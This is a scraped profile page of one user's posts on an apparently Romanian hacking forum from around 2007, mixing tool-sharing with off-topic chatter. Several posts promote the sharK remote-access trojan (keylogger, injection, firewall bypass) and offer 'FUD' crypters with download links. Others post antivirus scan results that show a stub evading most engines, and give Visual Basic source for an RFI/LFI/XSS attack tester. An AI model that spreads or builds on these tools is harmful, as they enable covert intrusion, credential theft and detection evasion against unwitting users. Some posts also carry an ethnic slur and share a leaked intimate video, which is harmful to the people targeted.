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Everything posted by Ras
Highlights: - FWB++ in Visual Basic, process injection+unhooking (=easy to stealth!) - On-The-Fly compressed traffic (including transfers!) --> Intelligent compression: sharK determines whether its smarter not to use compressed transfer (e.g. compressing jpeg files is a waste of time) - Completely new design - Completely new server & client core - mRC4 Encrypted Traffic (Modded version of RC4, therefore very safe data transfer) - High-End Screen Capture (Extremely stable and fast) - Keylogger with highlight feature - Remote Memory Execution & Injection (Start this uploaded exe in the memory of this remote exe) - VERY fast file manager listing due to unique technic - SIN can show screen preview To be continued... Release date: Unknown Screens: SIN: http://img205.imageshack.us/img205/9918/gui1bk0.png Statistics: http://img528.imageshack.us/img528/8412/shark31sj3.png Server Setup: http://img142.imageshack.us/img142/5660/shark32wr4.png System Information: http://img528.imageshack.us/img528/2734/shark33ek4.png Windows: http://img231.imageshack.us/img231/1919/shark34en1vs7.png Keylogger: http://img135.imageshack.us/img135/9505/shark35ks7.png Remote Memory Execution: http://img134.imageshack.us/img134/9163/shark36ok7.png File Manager / Keylogger: http://img142.imageshack.us/img142/7647/shark37au3.png SIn With Screen Preview: http://img292.imageshack.us/img292/9522/previewly7.png screens are from dev-time so actually they are diffrent from the release-version. total state: 60% Nu am stiut unde sa postez... asa ca am pus la offtopic
Link: Se pare ca si TU esti un curios... EDIT Am editat topicul asta pt ca nu mai avea rost sa fac altul. M-am inregistrat pe acest forum pe 7 noiembrie 2006... acum suntem in data de 7 noiembrie 2007. Sa speram ca nu o sa se inchida forumul... sa speram ca o sa mai intru pe forum inca 1 an sau chiar mai mult Data înscrierii: 07/Noi/2006 Mesaje: 958 Locaþie: Bucuresti BAFTA!
Treaba cea mai naspa este ca daca te duci in italia o sa te ia aia... aaa esti din romania si se uita la tine ca la felu 14. Si tiganu ala fix pe femeia aia a violat-o...
faza cu suseza e expirata www.hairstylesdesign.com www.hairstyle.com hair-factory.com www.thehairstyler.com de ce nu te duci la un stilist si ii spui tu cam ce gen ai vrea... si iti arata ala/aia vreun catalog... am sa mai revin cu cateva site-uri poate gasesc ceva interesant
poate sa scrie oricine ce vrea. kwe a lasat asa pt maniacii cu xss [cel putin asa cred eu] :roll:
M-am uitat si eu putin in codul sursa... Download: http://rapidshare.com/files/67896970/Shark_2.1.0.rar
se gaseste repede respectivu... actiunea intr-un club ceva
Link-ul merge perfect... Oricum ti-am uploadat aici tutorialul: http://www.mediafire.com/?4lyymnjy3u9
CREDITS: xyr0x 'Tool: RFI / LFI / XSS Tester 'Author: xyr0x 'Date: September 27th, 2007 'Agreement of use of my Open sources are; 'Give me full credit for where or what of mine 'you decide to use, thanks. xyr0x 'NOTES: I MAY START THIS UP AGAIN EVEN THOUGH I'M GIVING 'IT TO THE OPEN SOURCE COMMUNITY... Private Sub cmdAbout_Click() Form2.Show End Sub Private Sub cmdChecksite_Click() On Error Resume Next If txtsite.Text = "" Then MsgBox "Target site is not configured!", vbExclamation, App.Title Else If txtsyn = "" Then MsgBox "Syntax field is not configured!", vbExclamation, App.Title Else If txtRFI.Text = "" Then MsgBox "RFI Template is not included!", vbExclamation, App.Title Else If lstRFI.Text = "" Then MsgBox "Please select an RFI line to include!", vbExclamation, App.Title Else txtsite.Text = txtsite.Text + txtsyn.Text + lstRFI.Text + txtRFI.Text wb1.Navigate txtsite.Text + txtsyn.Text + lstRFI.Text + txtRFI.Text End If End If End If End If End Sub Private Sub cmdClear_Click() lstRFI.Clear End Sub Private Sub cmdimpSyn_Click() On Error Resume Next List1.Clear Dim item As String With CD1 .Filter = ".DAT(*.dat)|*.dat" .FilterIndex = 2 .CancelError = True On Error GoTo ErrHandler .ShowOpen Open .FileName For Input As #3 Do While Not EOF(3) Line Input #3, item If Len(item) > 0 Then List1.AddItem item End If Loop Close #3 End With Exit Sub ErrHandler: Exit Sub End Sub Private Sub cmdStop_Click() On Error Resume Next wb1.Stop wb1.Navigate ":blank" End Sub Private Sub Command1_Click() Form2.Show End Sub Private Sub Command2_Click() Form3.Show End Sub Private Sub cmdXSSCheck_Click() On Error Resume Next If txtsite.Text = "" Then MsgBox "Target site is not configured!", vbExclamation, App.Title Else If txtxss.Text = "" Then MsgBox "XSS string is missing!", vbExclamation, App.Title Else txtsite.Text = txtsite.Text + txtxss.Text wb1.Navigate txtsite.Text + txtxss.Text End If End If End Sub Private Sub Form_unload(Cancel As Integer) End End Sub Private Sub GurhanButton2_Click() txtsite.Text = "" txtsyn.Text = "" txtxss.Text = "" lstRFI.Text = "" txtRFI.Text = "" End Sub Private Sub GurhanButton6_Click() List1.Clear txtsyn.Text = "" End Sub Private Sub ldVulns_Click() On Error Resume Next lstRFI.Clear Dim item As String With CD1 .Filter = "DAT(*.dat)|*.dat" .FilterIndex = 2 .CancelError = True On Error GoTo ErrHandler .ShowOpen Open .FileName For Input As #3 Do While Not EOF(3) Line Input #3, item If Len(item) > 0 Then lstRFI.AddItem item End If Loop Close #3 End With Exit Sub ErrHandler: Exit Sub End Sub Private Sub List1_Click() Dim start Dim lstindex start = txtsyn.SelStart txtsyn.Text = "" lstindex = Len(List1.List(List1.ListIndex)) txtsyn.SelText = List1.List(List1.ListIndex) txtsyn.SetFocus txtsyn.SelStart = start + lstindex End Sub inca nu am testat...
Photo: Crypter Scan: Bagati mare ca dupa 2 zile o sa fie 100% detected Download: http://rapidshare.com/files/67130669/MT_Crypter_v2.rar Password: www . mortal - team . com EDIT parola este legata... daca scriu parola legata apare decat mortal nu stiu de ce...
nu are nimic asa e el mai caterincos
Here is the new Crew-Crypter! It's like my SnoopCrypt,but a few things changed: - New and stronger encryption Method. - Random encryption key (everytime you crypt the same file,the code will be different) - Icon change - Design - FUD Bifi+PI Picture: Download: http://rapidshare.com/files/67113479/Hac_Crew_Crypter.rar
thx moubik! @virusss: ar fi fost ca in matrix reloaded
If you want personal chat with a friendyou don't need to download any yahoo messengerAll you need is your friends IP address and Command Prompt. Firstly, open Notepad and enter: @echo off :A Cls echo MESSENGER set /p n=User: set /p m=Message: net send %n% %m% Pause Goto A Now save this as "Messenger.bat". Open the .bat file and in Command Prompt you should see: MESSENGER User: After "User" type the IP address of the computer you want to contact. After this, you should see this: Message: Now type in the message you wish to send. Before you press "Enter" it should look like this: MESSENGERUser:27.196.391.193 Message: Hi Now all you need to do is press "Enter", and start chatting! Some additional information I found: 1.Works only for static IP address. 2.Works in win 98,win 2000,win XP. 3.Yes it's need Services.msc to be enable. Nu stiu daca aceasta metoda este veche... eu azi am vazut asta pt prima data... Inca nu am testat pt ca nu am cu cine si nici nu am timp...
felicitari Nemessis!!! Si in Top Pagerank ne-a dat unu mai jos... 1 cn.widget.yahoo.com www.r3t.n3t.nl - cn.widget.yahoo.com Nemessis - wizards.yahoo.com Nemessis - email.people.yahoo.com Ras
http://www.incarcaricartele.ro/ http://www.incarcaricartele.ro/incarcari_gratuite.php Nu prea am inteles bine cum sta treaba cu acest site pt ca nu prea am timp. Mi-au dat niste amici acest site... Stiu ca vroiau cativa de pe acest forum niste chestii cu incarcari de cartele... Sa nu credeti ca va puneti nr si va vin 4 $ pe cartela sau mai stiu eu ce. Repet! Nu prea am inteles cum sta treaba cu acest site deci nu imi sariti in cap! Incarcari gratuite Pot sa imi incarc cartela gratis? Binenteles ca se poate. Sistemul nostru de refferali permite ca sa primesti 2% din valoarea pe care o incarca refferalul tau. Ce inseamna refferal? In contul tau de la cartele ai un link pe care il poti da prietenilor sau cunoscutilor ca sa se inscrie ca refferalul tau. Adica adusi de tine pe site. Si pentru fiecare incarcare a lor tu vei primi 2% in contul tau de pe site. Cu acesti bani poti cumpara cartele sau trimite sms-uri Unde gasesc contul de refferal (afiliat) Dupa ce va logati in cont pe butonul Afiliere gasiti linkul de afiliat (refferal) sau bannerele pe care le puteti pune pe siteul dvs.
Stub Scan: AhnLab-V3 2007.11.2.0 2007.11.02 - AntiVir 2007.11.02 - Authentium 4.93.8 2007.11.01 - Avast 4.7.1074.0 2007.11.02 - AVG 2007.11.01 Downloader.Agent.UOO BitDefender 7.2 2007.11.02 - CAT-QuickHeal 9.00 2007.11.01 - ClamAV 0.91.2 2007.11.01 - DrWeb 2007.11.01 - eSafe 2007.10.28 - eTrust-Vet 31.2.5262 2007.11.02 - Ewido 4.0 2007.11.01 - FileAdvisor 1 2007.11.02 - Fortinet 2007.10.19 - F-Prot 2007.11.01 - F-Secure 6.70.13030.0 2007.11.02 - Ikarus T3.1.1.12 2007.11.02 Virus.Win32.Zapchast.DA Kaspersky 2007.11.02 Trojan-Downloader.Win32.Agent.elh McAfee 5154 2007.11.01 - Microsoft 1.2908 2007.11.02 - NOD32v2 2633 2007.11.02 a variant of Win32/TrojanDropper.ErPack Norman 5.80.02 2007.11.02 - Panda 2007.11.02 - Prevx1 V2 2007.11.02 - Rising 2007.11.02 - Sophos 4.23.0 2007.11.02 - Sunbelt 2.2.907.0 2007.10.31 - Symantec 10 2007.11.02 IRC Trojan TheHacker 2007.10.27 - VBA32 2007.10.31 - VirusBuster 4.3.26:9 2007.11.01 - Webwasher-Gateway 6.6.1 2007.11.02 - Era 9:40 cand am scanat acel stub. Download: http://rapidshare.com/files/66881639/X_Crypter_1.1.rar
Link: Astept parerile voastre :lol:
ce trucaj? chiar nu iti dai seama de la o posta ca ala e capu lu' tatae ala ?
ce ratati... nu zic ca nu mi-as si eu o colega de banca la fel cum are ala )
l-au restrictionat si pe youtube si pe trilulilu... sa speram ca ramane pe zoso. EDIT si aici http://baghy.info/2007/10/31/monica-si-irinel-fac-sex-oral-in-restaurant/
Link: http://www.trilulilu.ro/Bluebabe/7d6f9df70482ef Se pare ca au prins-o pe Monica cand ii face sex oral lui Iri ))) EDIT Rog un admin sa stearga topicul. Au sters aia de pe youtube filmuletul. This video has been removed due to terms of use violation. blabla EDIT2 mi-a trecut prin cap sa ma uit si pe trilulilu si am gasit
Isi merita banii EDIT o sa lipsesc 7 zile... plec la un concurs... sa aveti grija de RST! bafta!
Merci mult!!! Am gasit un tutorial si imi trebuia acest program ca sa aflu offset-urile altui program